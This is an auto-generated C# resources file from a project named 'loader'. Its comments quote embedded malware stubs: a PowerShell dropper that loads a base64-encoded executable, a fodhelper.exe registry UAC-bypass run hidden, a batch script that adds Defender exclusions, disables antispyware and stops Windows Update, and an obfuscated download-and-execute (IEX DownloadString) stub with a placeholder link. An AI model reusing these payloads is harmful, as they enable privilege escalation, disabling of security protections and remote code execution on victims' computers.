//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace loader.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("loader.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        internal static System.Drawing.Bitmap rfgdhfgh1 {
            get {
                object obj = ResourceManager.GetObject("rfgdhfgh1", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to [void] [System.Reflection.Assembly]::LoadWithPartialName(&quot;Microsoft.VisualBasic&quot;)
        ///$ytr=&quot;TV&quot;
        ///$iy=&quot;qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAAwfVl8AAAAAAAAAAOAADiELAQYAAKoAAAAKAAAAAAAAbskAAAAgAAAA4AAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAABAAQAABAAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACDJAABLAAAAAAABAHQDAAAAAAAAAAAAAAAAAAAAAAAAACABAAwAAADbyAAAHAAAAAAAAAAAAAA [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string RunP {
            get {
                return ResourceManager.GetString("RunP", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to strCommand = &quot;Powershell.exe  -ExecutionPolicy Bypass $program=&apos;FILE&apos;;$jkl=(&apos;HKCU:\Software\Classes\ms-settings\##########\command&apos;).replace(&apos;##########&apos;,&apos;Shell\Open&apos;);New-Item ($jkl) -Force;New-ItemProperty -Path ($jkl) -Name &apos;DelegateExecute&apos; -Value &apos;&apos; -Force;Set-ItemProperty -Path ($jkl) -Name &apos;(default)&apos; -Value $program -Force;Start-Process &apos;C:\Windows\System32\fodhelper.exe&apos; -WindowStyle Hidden&quot; 
        ///
        ///set hg= CreateObject(&quot;Wscript.Shell&quot;)
        ///
        ///hg.Run strCommand ,0.
        /// </summary>
        internal static string String1 {
            get {
                return ResourceManager.GetString("String1", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to @echo off
        ///
        ///start powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath @#@#;New-ItemProperty -Path &apos;HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender&apos; -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;sc.exe config wuauserv start= disabled;sc.exe stop wuauserv.
        /// </summary>
        internal static string String2 {
            get {
                return ResourceManager.GetString("String2", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to strCommand = &quot;Powershell.exe  -noexit $c1=&apos;(New-Object Net.We&apos;; $c4=&apos;bClient).Downlo&apos;; $c3=&apos;adString(&apos;&apos;LINK&apos;&apos;)&apos;;$TC=I`E`X ($c1,$c4,$c3 -Join &apos;&apos;)|I`E`X&quot; 
        ///
        ///set g = GetObject(&quot;new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B&quot;)
        ///
        ///Execute(&quot;g.Run strCommand , 0&quot;).
        /// </summary>
        internal static string stub_N {
            get {
                return ResourceManager.GetString("stub_N", resourceCulture);
            }
        }
    }
}
